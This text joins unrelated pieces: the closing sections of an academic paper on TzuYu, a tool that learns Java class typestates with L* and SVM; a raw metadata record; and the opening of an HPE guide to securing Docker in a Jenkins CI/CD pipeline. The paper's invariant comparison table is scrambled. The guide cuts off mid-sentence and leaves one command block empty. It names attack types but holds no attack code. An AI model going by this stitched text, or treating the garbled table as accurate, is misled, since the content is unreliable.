are needed (e.g., to evaluate the guard conditions). One key step in our approach is to automatically generate a divider for alphabet refinement. We use the SVM techniques implemented in LibSVM [6]. The first problem with using SVM is how to choose a good hyperplane as there are in theory an infinite set of hyperplanes which separate two sets of object states. The second problem is that the hyperplane discovered by LibSVM often has float number coefficients, which are often not as readable as integer values when we use them to build the typestate. Thus, we always (if possible) choose integer coefficients which constitute a hyperplane which lies between the strongest and weakest hyperplane. Further, we implemented a few heuristics to preprocess the inputs to LibSVM for generating a better divider. Firstly we balance the positive and negative input data sets by duplicating data randomly chosen from the smaller set of the two, as SVM tends to build biased hyperplane when the input data-set is imbalanced. Secondly, because the arguments of method calls are generated randomly, LibSVM may generate an incorrect divider. For instance, given a Stack with a size bound 5, if \textit{push} is invoked with arguments in \{1, 2, 3\} when there are already 5 items in the stack, whereas it is invoked with arguments in \{5, 6, 7\} when there are less than 5 items in the stack. LibSVM may generate a divider \textit{element} \geq 4 suggesting that calling \textit{push} with an input less than 4 will lead to failure. This is obviously incorrect. The problem is avoided with cross validation by checking whether the argument really affects the execution results. This is done by executing the normal (failed, respectively) traces whose non-receiver arguments are substituted with arguments in the failed (normal, respectively) traces. For instance, in the above example, additional test cases are generated so that every invocation of \textit{push} is tested with the same set of input values, i.e., \{1, 2, 3, 5, 6, 7\}. As a result, if the value is irreverent in determining whether the test fails or succeeds, it will be ruled out by LibSVM. V. Evaluation In this section, we first evaluate TzuYu on a set of Java library classes selected from JDK and then compare TzuYu with existing tools. All the experiments were carried out on a Ubuntu 13.04 PC with 2.67 GHz Intel Core i7 Duo processors and 4 GB memory. All the experimental data is available in the web site [28]. The selected JDK classes (from previous related papers [13, 27]) are shown in Table I. Column \textit{LOC} shows the size of the class in terms of lines of code. Column \#\textit{Method} is the number of methods (excluding the constructors of the target class) which are defined in the target class and used to generate the initial alphabet. In this set of experiments, we generate two values for each parameter in each method. To get a numerical vector from an object state (for SVM consumption), we limit the numerical value graphs to its top five levels, which we found to be sufficient. A. Results Table I also shows the statistics of the experiments. Column \textit{T_{total}} is the total time used in milliseconds. The subsequent three columns show details about the L* algorithms. Column \#\textit{MQ} and \#\textit{CQ} are the number of membership queries and candidate queries, respectively. Column \#\textit{Trace} is the total number of abstract traces generated from random walking. Column \#\textit{Trace}+ is the number of positive concrete test cases generated by TzuYu. Column \#\textit{SVM} and \textit{T_{SVM}} are the total number of SVM calls and the time in milliseconds taken by SVM to generate dividers, respectively. The last two columns show the size of alphabets and states in the final DFA, respectively. The following observations are made based on the results. Firstly, TzuYu successfully learned typestates in all cases efficiently, i.e., often in seconds. Furthermore, in most cases, the time taken by SVM is less than 20\% of total time except for \textit{java.io.PipedOutputStream} where the cross validation (in order to determine whether a method parameter is relevant) in a SVM call consumes a few seconds. Secondly, all learned... TABLE II PROGRAM INVARIANTS GENERATED BY DAikon, PSYCO AND TzuYu <table> <thead> <tr> <th>Method</th> <th>Daikon</th> <th>PSYCO</th> <th>TzuYu</th> </tr> </thead> <tbody> <tr> <td>java.io.Stack.pop()</td> <td>-</td> <td>-</td> <td>elementCount ≥ 1</td> </tr> <tr> <td>java.util.Stack.peek()</td> <td>-</td> <td>-</td> <td>elementCount ≥ 1</td> </tr> <tr> <td>example.BoundedStack.push(Integer)</td> <td>size one of {0, 1, 2}</td> <td>size ≤ 2</td> <td>size ≥ 1</td> </tr> </tbody> </table> | java.io.PipedOutputStream.connect(snk) | size one of {1, 2, 3} | size ≥ 1 | sink == null && snk != null & | | | | & snk.connected == false & | | | | sink != null | | java.io.PipedOutputStream.write(int) | sink == null && snk != null | sink == null && snk != null & | | & snk.connected == false | & snk.connected == false & | example.PipedOutputStream.connect(snk) | sink != null | sink != null | | example.PipedOutputStream.write(snk) | Signature VERIFY == state | Signature.SIGN == state | state ≥ 2 | | example.Signature.verify() | Signature.SIGN = state | | state ≥ 1 | | example.Signature.sign() | Signature.SIGN < state | | | Typestates are sound and complete, which we confirm by comparing the learned one with the manually constructed actual one. Thirdly, the number of states in the learned typestate is minimum, i.e., two as we are differentiating two states only: failure or non-failure. This implies that for every method, whether invoking the method leads to failure or not can be determined by looking at the value of the data variables, and further, SVM is able to identify a suitable proposition every time. Lastly, we did not record the memory consumption due to the garbage collection feature of JVM. However, the memory consumption is relatively small since we did not store the instrumented states with the test cases and the number of test cases is relatively small which are linear in the number of candidate queries. B. Compare with related tools We identified three closely related tools. PSYCO [13] is a symbolic execution based typestate learning tool; ADABU [10] is a dynamic behavior model mining framework and Daikon [12] is a dynamic invariant generator. We compare TzuYu with them in terms of time and the quality of the generated models. Table II shows the results of the invariants generated by the three tools and TzuYu. Notice that PSYCO is not available at the time of writing; we thus only obtain the learned typestate documented in their paper [13]. We first compare the models learned by different tools, as shown in Table II. The invariant generated by ADABU are state invariants and they are skipped from Table II. Methods with the trivial true invariant (e.g., size() in Stack) are also omitted. Both ADABU and Daikon need test cases as input to mine models and therefore we use the test cases generated by TzuYu as the input to them for a fair comparison. The number of test cases for each class is shown in the #TC column of Table I. Neither ADABU nor Daikon is able to learn models for all of the classes. For instance, neither mined models for the java.io.PipedOutputStream class. ADABU often generates multiple (e.g., dozens of) models for one class, which means that ADABU cannot merge them to get one final model. That is, ADABU’s state abstraction techniques failed to generate a good invariant. The reason is that ADABU employs a set of pre-defined templates to generate invariants. If a mined state invariant contains irrelevant variables, ADABU’s state abstraction and model merging technique fail and therefore no unified model is generated. In another example, Daikon failed to mine models for java.util.Stack class. Both ADABU and Daikon use pre-defined invariant templates. In comparison, the typestates (which are invariants) generated by TzuYu are better because TzuYu does not rely on templates but rather uses SVM techniques to discover propositions dynamically based on the object states. Furthermore, Daikon uses only successful executions whereas TzuYu uses both successful and failed executions, thus the model learned by TzuYu is more accurate than the one generated by Daikon. For the two examples (example.PipedOutputStream and example.Signature) which have been reported in paper [13], PSYCO learns accurate transition guards due to the fact that PSYCO encodes all path conditions in the source code and uses SMT solver to find out exactly whether failure happens. PSYCO, however, is limited by the capability of SMT solvers. Next, we compare the execution time of each tool on mining the models briefly. The time taken by each tool to mine the models is plotted in Fig. 8. PSYCO is not available for running the target classes, we cannot get the time for it. Both ADABU and Daikon need test cases while TzuYu generates the test cases, we only include the time consumed by SVM for TzuYu. The figure shows that TzuYu often uses less time in generating. ![Fig. 8. Time consumed in milliseconds to mine models for target classes.](image-url) the models. An exception is the java.io.PipedOutputStream class for the reason mentioned above. C. Limitations of TzuYu Firstly, because our approach is based on testing, there is no guarantee on whether the learned typestate is sound or complete. However, this can be fixed to certain extent by using an SMT solver to verify the learned typestate. For instance, the typestate for Stack in Fig. 3 (b) can be verified by showing that each transition is sound and com- plete, e.g., the self-looping transition at state 1 labeled with \[ \text{eleCount} \neq 0 \] \text{pop} \text{can be verified by proving two Hoare triples:} \{ \text{eleCount} \neq 0 \} \text{pop} \text{(executing pop with a pre-condition eleCount \neq 0 will not lead to error) and }\{ \text{eleCount} = 0 \} \text{pop} \text{(error). Further, if an SMT solver identifies a counterexample, the counterexample can be used to refine the typestate. We are currently implementing this verification step in TzuYu.} Secondly, because our approach is based on random testing, there is no guarantee that a good divider can be discovered in general—though it should emerge in theory after sufficient testing. This can be partially fixed if we can obtain “better” test cases through different means, e.g., from real execution history of the given class, or through more sophisticated test case generation methods like concolic testing [24] and combinational testing. It is our future work to evaluate the effectiveness of different test case generation methods in our setting. Thirdly, our method will not terminate if the typestate for the class under analysis is beyond the expressiveness of finite-state machines with linear guard conditions. If the refiner fails to find a divider for a membership query with conflicting results (i.e., same sequence of events leading to failure sometimes and success sometimes), a counterexample (i.e., a path which is predicated to fail by the typestate but succeeds according to the testing result, or the other way round) is returned so that \text{L*} may introduce a new state. In the worst case, TzuYu will keep generating typestates with ever growing number of states (and eventually times out). This is due to the limitation of SVM that could be overcome using advanced learning techniques. VI. RELATED WORK Our approach is related to specification mining. We refer interested readers to the book [18] for a comprehensive literature review. Therefore, we only review previous work that is closely related to the three components in TzuYu and the overall approach. The idea of using testing as a teacher is also found in paper [14] which combines \text{L*} learning with model check- ing to check a system against its properties. In case of a counterexample returned by model checker, it uses testing based \text{L*} to augment the current model of the system. It gradually progresses to the final result of either proof or disproof the system against its properties. The idea of learning interfaces specifications from source code was proposed in the seminal paper [3] which learns interface specifications from source code automatically by using a model checker as the teacher. The more recent Psyco tool [13] achieves the same goal by using a symbolic execution engine as the teacher. In comparison, TzuYu employs testing and thus avoids expensive model checking or symbolic execution. Similarly, Aarts et el. [1] proposed a fully automated data abstraction technique to learn a restricted form of Mealy machine in which only testing equality of arguments is allowed. TzuYu’s SVM based alphabet refinement can be applied to more programs. Our testing strategy is related to the Randoop tool [20]. We extend Randoop to the context of learning in which the receiv- er object must be the same in order to learn a better model and we also add a new source for reference arguments which can be chosen from an out-reference variables to improve data coverage. Tester in TzuYu is also related to TAUTOKO [9] which generates more test cases by mutating existing traces in the initially mined model (by using ADABU) to augment the model learning process as well as finding bugs for the class under test. We extend the active learning \text{L*} algorithm with lazy alphabet refinement. There are also other learning algorithms such as [22]. The sk-strings algorithm [22] passively learns DFA from a given set of traces by generalizing the method call sequences in the trace to form the final typestate. ADABU [10] can be classified as a passive learner which requires a set of test cases as input, it abstracts the concrete states with simple templates to abstract states thus to get the abstract traces and then it merges models from abstract traces to generate a model. The combination of active learning algorithm with automatic argument generation techniques enables TzuYu learning state- ful typestates automatically. The refiner in TzuYu was inspired by the work [25] which uses SVM and SMT solver to generate interpolants for coun- terexamples produced by model checkers. The goal of the refiner is in line with that of the dynamic invariant generator Daikon [12] and the tool Axiom Meister [27]. Daikon use a set of pre-defined invariant templates over data from the set of given runtime traces. Daikon may find some irrelevant invari- ants at a program point. The Axiom Meister uses symbolic execution to collect all the path conditions which are then abstracted to preconditions. The TzuYu refiner is based on SVM which enables TzuYu finding relevant linear arithmetic propositions over a large number of variables. VII. CONCLUSION Despite the recent progress on learning specifications from various software artifacts, the community is still challenged with difficulties in dealing with data abstraction for common programs. In this paper, we propose a fully automated types- tates learning approach from source code. To fully automate the generation of test cases which are the required inputs for many automata learning tools, we combine the active learning algorithm \text{L*} with a random argument generation technique. We then use a supervised machine learning algorithm (i.e., the SVM algorithm) to abstract data into proposition. REFERENCES
{"Source-Url": "http://people.sutd.edu.sg/~sunjun/Publications/ASE13b.pdf", "len_cl100k_base": 14001, "olmocr-version": "0.1.50", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 45904, "total-output-tokens": 16598, "length": "2e13", "weborganizer": {"__label__adult": 0.00033974647521972656, "__label__art_design": 0.0003399848937988281, "__label__crime_law": 0.00025200843811035156, "__label__education_jobs": 0.0021953582763671875, "__label__entertainment": 6.61015510559082e-05, "__label__fashion_beauty": 0.00016427040100097656, "__label__finance_business": 0.00018310546875, "__label__food_dining": 0.0002887248992919922, "__label__games": 0.0005979537963867188, "__label__hardware": 0.0006680488586425781, "__label__health": 0.0003292560577392578, "__label__history": 0.0002061128616333008, "__label__home_hobbies": 9.387731552124023e-05, "__label__industrial": 0.00031256675720214844, "__label__literature": 0.0003261566162109375, "__label__politics": 0.0002446174621582031, "__label__religion": 0.0004291534423828125, "__label__science_tech": 0.01078033447265625, "__label__social_life": 0.00010734796524047852, "__label__software": 0.00530242919921875, "__label__software_dev": 0.97607421875, "__label__sports_fitness": 0.0002613067626953125, "__label__transportation": 0.0004601478576660156, "__label__travel": 0.0001852512359619141}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 62973, 0.02235]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 62973, 0.58505]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 62973, 0.8825]], "google_gemma-3-12b-it_contains_pii": [[0, 5755, false], [5755, 10148, null], [10148, 17419, null], [17419, 22715, null], [22715, 29694, null], [29694, 36024, null], [36024, 41178, null], [41178, 46561, null], [46561, 52660, null], [52660, 58917, null], [58917, 62973, null]], "google_gemma-3-12b-it_is_public_document": [[0, 5755, true], [5755, 10148, null], [10148, 17419, null], [17419, 22715, null], [22715, 29694, null], [29694, 36024, null], [36024, 41178, null], [41178, 46561, null], [46561, 52660, null], [52660, 58917, null], [58917, 62973, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 62973, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 62973, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 62973, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 62973, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 62973, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 62973, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 62973, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 62973, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 62973, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 62973, null]], "pdf_page_numbers": [[0, 5755, 1], [5755, 10148, 2], [10148, 17419, 3], [17419, 22715, 4], [22715, 29694, 5], [29694, 36024, 6], [36024, 41178, 7], [41178, 46561, 8], [46561, 52660, 9], [52660, 58917, 10], [58917, 62973, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 62973, 0.033]]}
olmocr_science_pdfs
2024-12-01
2024-12-01
1f96ed31574438ac1ef4bd71dd80386772234575
HPE Reference Configuration for securing Docker on HPE hardware Docker security in a DevOps environment Contents Executive summary ........................................................................................................... 3 Introduction ..................................................................................................................... 3 Security threats for containers ................................................................................. 3 Docker security overview ......................................................................................... 3 Docker security timeline ......................................................................................... 4 Reference Configuration overview ......................................................................... 4 Solution overview ......................................................................................................... 5 Solution components ..................................................................................................... 5 Hardware .................................................................................................................. 5 Software .................................................................................................................. 6 Application software ............................................................................................... 7 Best practices and configuration guidance for the solution ........................................... 7 Configuration guidance for the solution .................................................................. 8 Best practices for CI/CD ......................................................................................... 11 Best practices for development ............................................................................. 18 Best practices for operations ................................................................................ 19 Summary ........................................................................................................................ 20 Appendix A: Jenkins implementation details .................................................................. 21 Building a sample project to test Jenkins service .................................................. 21 Proxy configuration for Jenkins ............................................................................. 22 Proxy configuration when building sample images .............................................. 22 Appendix B: Pipeline for building and deploying stack .................................................. 23 Pipeline script ........................................................................................................ 23 Compose file for deploying stack ......................................................................... 24 Appendix C: Content Trust implementation details ......................................................... 26 UCP Content Trust ................................................................................................. 26 Install Notary client ............................................................................................... 26 Initialize trust metadata for official repositories ................................................. 26 Initialize trust metadata for dev repositories ....................................................... 27 Deploy the stack in UCP ....................................................................................... 28 Resources and additional links ..................................................................................... 30 Executive summary Software development in the enterprise is undergoing rapid and widespread change. Application architectures are moving from monolithic and N-tier to cloud-native microservices while the development process has transitioned from waterfall through agile to a DevOps focus. Meanwhile, deployments have moved from the data center to hosted environments and now the cloud (public, private and hybrid) and release cycles have shrunk from quarterly to weekly, or even more frequently. To remain competitive, businesses require functionality to be delivered in a faster and more streamlined manner, while facing into ever-increasing security threats from both organized and ad-hoc adversaries. Container technology promises to deliver the speed and agility required by enterprises, but a major obstacle to its adoption is the perceived security vulnerabilities involved. What is needed is usable security out-of-the-box, covering the entire software supply chain. At the same time, it should be customizable to facilitate easy integration into existing systems, so the current investments can be reused. Over the past few years, Docker has migrated from a developer-friendly tool to an enterprise standard solution, providing the agility and security that businesses need across the full software workflow, from development through testing to deployment and day-to-day operations. It has enhanced its security features to such an extent that it is now safe to say that applications can run more securely in containers compared to running on bare-metal. Target audience: This paper is for CIOs, technical architects, operations and security professionals who are exploring the possibility of using Docker for enterprise application development and deployment on Hewlett Packard Enterprise hardware. Document purpose: The purpose of this document is to describe a best practice scenario for securing Docker, from application development through the continuous integration / continuous delivery (CI/CD) pipeline. Readers can use this document to achieve the following goals: - Gain insight into how to leverage Docker security features throughout the CI/CD process. - Learn by example how to build and use a CI/CD pipeline using Jenkins for Docker container development. Introduction Security threats for containers Containers differ from virtual machines in that containers use a shared kernel that facilitates faster start-up and more efficient resource usage. However, it means the kernel is a single point-of-failure and any security breach can breakout to all containers in the system. Securing Docker requires reducing the attack surface and limiting the “blast-radius” should any attack succeed. Attacks come in a number of vectors including: - External attacks: These attacks take a variety of forms including distributed denial-of-service (DDoS) targeting system resources, or exploitations targeting unpatched kernel or image vulnerabilities, weak passwords or incorrectly exposed internal services. (The potentially short lifetime of a container can make it hard to include it in regular patch management cycles and so it is important to address such updates in the generation of the source, “golden” image. For more information, see the section on Immutable Infrastructure). - Container attacks on host: A container can, either maliciously or accidentally, cause a denial of service on the host through excessive use of memory, CPU or disk resources. Alternatively, a malicious container could launch attacks such as a “fork bomb” or a “billion laughs” XML bomb to exhaust a system’s resources. Vulnerabilities in third party containers or in the kernel itself can allow access to private information on the host, or even modification of the kernel itself. - Container attacks on other containers: Similar denial of service attacks can be inflicted on other containers that share the same host. These can vary from innocent “noisy neighbor” issues to infected containers accessing the information belonging to other containers. Insecure applications will still be insecure whether they run in containers or not – however, we will see that running applications within containers can significantly reduce the impact of any attack due to the underlying protections available out of the box using Docker. Docker security overview Docker’s core philosophy on security is to make it work out of the box and easy to use, while at the same time allowing users to customize it to suit their own compliance and audit requirements. The three pillars of Docker security are: - Secure platform: This consists of securing the Docker daemon and of fundamental container security features like namespaces, cgroups, capabilities, Secure Computing (Seccomp), and Linux Security Modules (for example, AppArmor, SELinux). It also covers the orchestration of nodes that participate in a swarm cluster with mutually authenticated TLS, providing authentication, authorization and encryption of data in motion. • **Secure content:** Signing images and storing them in a trusted registry is a cornerstone of the Docker strategy for securing content. In addition, enabling Docker Content Trust will prevent any unsigned images from being used. Images in the registry can be scanned for vulnerabilities, not just at the time of creation but also on an on-going basis, so that any newly discovered threats will be flagged for remediation. Integrated secrets management allows you to safely store multiple versions of sensitive password and configuration information for use in different stages of the development and release workflow. • **Secure access:** Docker Universal Control Plane (UCP) supports fine-grained Role-Based Access Control (RBAC) and LDAP/AD integration with external systems. **Docker security timeline** Over the past four years, Docker has transformed from a handy tool favored by developers into an enterprise solution that processes billions of commercial transactions every day. Along the way, a number of security concerns have arisen that might lead a business executive to doubt if a tool championed by developers is suitable for deployment in front-line production systems. Headlines warning of “Container Breakout”, “Privilege Escalation” and “Dirty Cow Vulnerabilities” have generated fear, uncertainty and doubt and in this paper we address those concerns. We show how Docker has proactively addressed these issues over successive releases, using multiple layers of security in a defense-in-depth strategy so that security is now built-in and usable, while also being highly customizable so as to preserve any existing investment in security infrastructure. In particular, we look at how Docker can increase security across the entire software supply chain from development, integration and testing through to the delivery and deployment of complex, business-critical applications on multiple programming stacks and platforms. <table> <thead> <tr> <th>Date</th> <th>Release</th> <th>Features</th> </tr> </thead> <tbody> <tr> <td>Aug 2014</td> <td>1.2</td> <td>Capabilities</td> </tr> <tr> <td>Oct 2014</td> <td>1.3</td> <td>SELinux, AppArmor</td> </tr> <tr> <td>Dec 2014</td> <td>1.4</td> <td>Security vulnerabilities addressed</td> </tr> <tr> <td>Aug 2015</td> <td>1.8</td> <td>Docker Content Trust (Image signing based on Notary)</td> </tr> <tr> <td>Nov 2015</td> <td>1.9</td> <td>Security Scanning</td> </tr> <tr> <td>Feb 2016</td> <td>1.10</td> <td>User namespace, seccomp, authorization plug-in</td> </tr> <tr> <td>Feb 2016</td> <td>Datacenter 1.0</td> <td>Role-Based Access Control (RBAC), LDAP/AD</td> </tr> <tr> <td>May 2016</td> <td>1.11</td> <td>Comprehensive CIS Benchmark, Yubikey hardware image signing</td> </tr> <tr> <td>June 2016</td> <td>1.12</td> <td>Secure-by-default out-of-the-box, yet customizable (mutually authenticated TLS, providing authentication, authorization and encryption to the communications of every node participating in a swarm)</td> </tr> <tr> <td>Jan 2017</td> <td>1.13</td> <td>Secrets management, System prune for garbage collection</td> </tr> <tr> <td>Jan 2017</td> <td>Datacenter 2.0</td> <td>Image security scanning and vulnerability monitoring</td> </tr> <tr> <td>March 2017</td> <td>17.03</td> <td>Latest release at time of writing</td> </tr> </tbody> </table> **Reference Configuration overview** This Reference Configuration (RC) covers best practices for overall security across the entire software development lifecycle. It uses the sample Docker application, the example voting app found at [https://github.com/dockerexamples/example-voting-app](https://github.com/dockerexamples/example-voting-app), in a continuous integration / continuous delivery (CI/CD) pipeline using Jenkins to identify best practices for the development, build, and deployment stages of the lifecycle. The configuration uses HPE ProLiant DL360 (Gen 9 and Gen 8) servers but the over-arching principles for securing the enterprise software lifecycle apply to all Docker EE deployments on Hewlett Packard Enterprise hardware, including Hyper Converged, Synergy and SimpliVity offerings. For more targeted information about other platforms, see the HPE Reference Configuration for Docker Datacenter on HPE Hyper Converged 380 and HPE Reference Configuration for Docker Enterprise Edition (EE) Standard on HPE Synergy with HPE Synergy Image Streamer. Reference Configuration documentation. This version of the Reference Configuration focuses on best practices for overall security in the development lifecycle and, as such, we do not cover specific networking or storage configurations. For more information, see HPE Reference Configuration for Docker Datacenter on Bare Metal with Persistent Docker Volumes. Docker Reference Architectures are available at https://success.docker.com/Architecture, including ones for Security, Development Pipeline and Deployment Architecture. **Solution overview** The solution, as shown in Figure 1, consists of a two-node cluster for the continuous integration/continuous delivery (CI/CD) system with Docker Universal Control Plane (UCP) on one manager node and Docker Trusted Registry (DTR) on the second, worker node. ![ Solution overview diagram ] **Figure 1. Solution overview** **Solution components** The following components were utilized in this Reference Configuration. **Hardware** The following hardware components were utilized in this Reference Configuration as listed in Table 2. **Table 2. Hardware Components** <table> <thead> <tr> <th>Component</th> <th>Purpose</th> </tr> </thead> <tbody> <tr> <td>HPE ProLiant DL360 Gen9</td> <td>Bare-metal Docker swarm host for CI/CD environment</td> </tr> <tr> <td>HPE ProLiant DL360 Gen8</td> <td>Bare-metal Docker swarm host for CI/CD environment</td> </tr> </tbody> </table> Software The following software components were utilized in this Reference Configuration as listed below in Table 3. <table> <thead> <tr> <th>Component</th> <th>Version</th> </tr> </thead> <tbody> <tr> <td>Docker Universal Control Plane (UCP)</td> <td>2.1.4</td> </tr> <tr> <td>Docker Trusted Registry (DTR)</td> <td>2.2.4</td> </tr> <tr> <td>Docker Engine</td> <td>17.03.1-ee-3</td> </tr> <tr> <td>HPE Insight Control server provisioning</td> <td>7.6</td> </tr> <tr> <td>Jenkins</td> <td>jenkins:2.46.3-alpine</td> </tr> <tr> <td>Jenkins Swarm Client</td> <td>3.3</td> </tr> <tr> <td>Docker example voting app</td> <td><a href="https://github.com/dockersamples/example-voting-app/commit/44efef623c0d1ab3c7853a3bc4006465e8341b6c3">https://github.com/dockersamples/example-voting-app/commit/44efef623c0d1ab3c7853a3bc4006465e8341b6c3</a></td> </tr> </tbody> </table> Docker Enterprise Edition Advanced Docker Enterprise Edition (EE) is designed for enterprise development and IT teams who build, ship and run business critical applications in production at scale. Docker EE is integrated, certified and supported to provide enterprises with the most secure container platform in the industry to modernize all applications. An application-centric platform, Docker EE is designed to accelerate and secure the entire software supply chain, from development to production, running on any infrastructure. The Advanced edition adds security scanning and continuous vulnerability monitoring on top of the Standard edition features such as advanced image and container management, LDAP/AD user integration, and Role-Based Access Control (RBAC). Docker Enterprise Edition provides integrated container management and security. Enterprise ready capabilities like multi-tenancy, security and full support for the Docker API give IT teams the ability to scale operations efficiently without breaking the developer experience. Open interfaces allow for easy integration into existing systems and the flexibility to support any range of business processes. Docker EE provides a unified software supply chain for all apps - commercial off-the-shelf, homegrown monoliths to modern microservices written for Windows® or Linux® environments on any server, VM or cloud. Docker Enterprise Edition features include: - Built-in clustering and orchestration - Integrated management of all app resources from a single web admin UI. - Secure, multi-tenant system with granular Role Based Access Control (RBAC) and LDAP/AD integration. - End-to-end security model with secrets management, image signing and image security scanning. - Self-healing application deployments with the ability to apply rolling application updates. - Open and extensible framework, supporting existing enterprise systems and processes. HPE Insight Control server provisioning (ICsp) Insight Control server provisioning (ICsp) build scripts are used to automate the deployment of Docker EE on the HPE ProLiant servers. Insight Control server provisioning is designed to streamline server provisioning administrative tasks. It simplifies the process of deploying operating systems on HPE ProLiant bare-metal servers as well as virtual machines. HPE Insight Control server provisioning allows the administrator to perform the following tasks: - Install Microsoft® Windows Server®, Linux, VMware® vSphere®, and Microsoft Hyper-V on HPE ProLiant servers. - Deploy to target servers with, or without, PXE. - Run deployment jobs on multiple servers simultaneously - Customize HPE ProLiant deployments with an easy-to-use, browser-based interface The ICsp build scripts to automate the deployment of Docker EE on HPE ProLiant servers are available at https://github.com/HewlettPackard/ICsp-Docker-OSBP. For this Reference Configuration, the servers are running Red Hat Enterprise Linux®, RHEL 7.2, and so the prerequisites for running the scripts in this particular environment include: - Installing and configuring ICsp to deploy RHEL OS - A Red Hat® network account to download files from the Internet or access to an internal RHEL repository - Setting a proxy hostname and port, as the target systems in this particular environment are behind a proxy **Application software** The application software for this Reference Configuration includes Jenkins and various Jenkins build agents. The Jenkins image, jenkins:2.46.3-alpine, is downloadable from https://store.docker.com/images/jenkins while the Jenkins Swarm Client is available at https://repo.jenkins-ci.org/releases/org/jenkins-ci/plugins/swarm-client/3.3/swarm-client-3.3.jar. **Best practices and configuration guidance for the solution** In smaller organizations, developers usually perform multiple roles including building, testing and deploying the software they write. However, in large companies, there tends to be more clear-cut roles and responsibilities, even if this distinction is blurring somewhat with the advent of DevOps. This section covers best practices for development, integration, testing, delivery and deployment in an enterprise environment. A typical CI/CD workflow using Docker Enterprise is shown in Figure 2. ![Figure 2. CI/CD workflow using Docker Enterprise Edition](image) Code is pulled from the Source Code Management (SCM) system and build artifacts are produced (for example, Java is compiled into jar or war files) and these artifacts are stored in the appropriate repository (for example, Artifactory). Docker images are created using the build artifacts and pushed to a local registry, taking advantage of the signing, scanning and secret management features. These images are combined to deploy services to the cluster which can then be tested and approved by the QA team. Configuration guidance for the solution In this section, we start with the installed software (Docker EE with a running swarm) and then: - Configure a CI/CD environment using Jenkins - Add build agents for Jenkins - Build images for a sample application - Push the images to a local repository, signing and scanning them for security - Deploy the application to the swarm We use the Docker example voting app, https://github.com/dockersamples/example-voting-app, as shown in Figure 3, consisting of: - Python webapp which lets you vote between two options - Redis queue which collects new votes - .NET worker which consumes votes and stores them in a Postgres database - Postgres database backed by a Docker volume - Node.js webapp which shows the results of the voting in real time Figure 3. Example voting application Configuring Jenkins In this configuration, we run Jenkins as a service on a Docker swarm using a recent image from Docker Hub. For the sake of simplicity, we use the local filesystem for storing Jenkins setup and build data by creating and mounting the jenkins_home directory – in a real-world scenario, you would configure a persistent storage volume. As a consequence of this simplification, we want the master and build agents to run on the same swarm manager node. Identify Jenkins node We explicitly identify this swarm manager node by adding a label using `docker node update --label-add env=jenkins 10.10.174.27` and then targeting that node using a constraint when starting the service. Note You can check if the label has been applied correctly to the node using the command `docker node inspect self`. Start Jenkins service Once you have created the `jenkins_home` directory locally (and ensured that container's `jenkins` user has write access to it), create the service for the Jenkins master as follows: ```bash docker service create \ --name jenkins-noproxy \ -p 8082:8080 \ -p 50000:50000 \ --constraint 'node.labels.env == jenkins' \ -e JENKINS_OPTS="--prefix=/jenkins" \ --mount "type=bind,source=$PWD/jenkins_home,target=/var/jenkins_home" \ jenkins:2.46.3-alpine ``` Jenkins is now available at `http://10.10.174.27:8082/jenkins` and will prompt for a password that can be retrieved from `jenkins_home/secrets/initialAdminPassword`. If Jenkins cannot connect to the internet, it will prompt to configure the proxy settings by displaying the Manage Jenkins → Manage Plugins → Advanced screen. Once configured, proceed to install the suggested plugins and then set up the first admin user account and corresponding password. To test the installation, it is recommended you follow the example in Appendix A in the section Build sample project to test Jenkins service. Install Self-Organizing Swarm plug-in Jenkins agents running as services on the Docker swarm facilitate the building of projects in various programming languages. These agents require the installation of the Self-Organizing Swarm Plug-in Modules. Navigate to Manage Jenkins → Manage Plugins → Available, search using the term “swarm” and then install the Self-Organizing Swarm plug-in. Note The “swarm” here confusingly relates to a similarly-named but separate Jenkins Swarm Client rather than the underlying Docker swarm. The Jenkins agents use JNLP to connect to the Jenkins master and each agent is used for a specific technology. Installing Docker build agents There are a number of ways to create Jenkins agents so that they can build, push and deploy Docker images and the method that you use will have an impact on your overall security posture: - **Unsecured**: Using a base Docker image and sharing the Docker socket (`/var/run/docker.sock`) to facilitate running Docker commands on the host node (“Docker out of Docker”). - **Secure**: Using a base Linux image, installing Docker CLI and using UCP client bundle to allow the `jenkins` user to access the authorized TCP socket rather than the unauthenticated/unauthorized Docker socket. In both instances, a layer is added to set up the Java-based communications with the Jenkins master. If the `jenkins_home/workspace` directory does not already exist locally (it will if you built the sample project) then you will need to create it and ensure that the container has write access to it. Using the authorized TCP socket (secure) While it can be convenient to share the Docker socket, you should be aware that this can leave you open to privilege escalation and instead you should always use the authorized TCP socket. Here we start with a small alpine image and then install the Docker CLI, docker-compose and the Java Swarm Client jar. ``` docker service create --name docker-agent-cli \ --mode global \ --constraint 'node.labels.env == jenkins' \ --mount "type=bind,source=$PWD/jenkins_home/workspace,target=/workspace" \ gmcgoldrick/docker-agent-cli ``` Log in to UCP as the jenkins user and download the corresponding client bundle. Upload the bundle to the running container (using `docker cp`), then `docker exec` into the container, extract the files and set up the environment variables using `eval $(<env.sh)`. Now, run the Java client to connect to the Jenkins master. ``` ``` The command options passed into the Jenkins Swarm Client jar make the connection with the Jenkins master, setting a label of 'docker-cli' that we will use later as the target agent for builds. If successful, the agent will appear in the Build Executer Status panel and will be listed at http://10.10.174.27:8082/jenkins/computer/. If you drill into the agent details, you will see the ‘docker-cli’ label that was associated with the agent when starting the Jenkins Swarm Client. Deploying 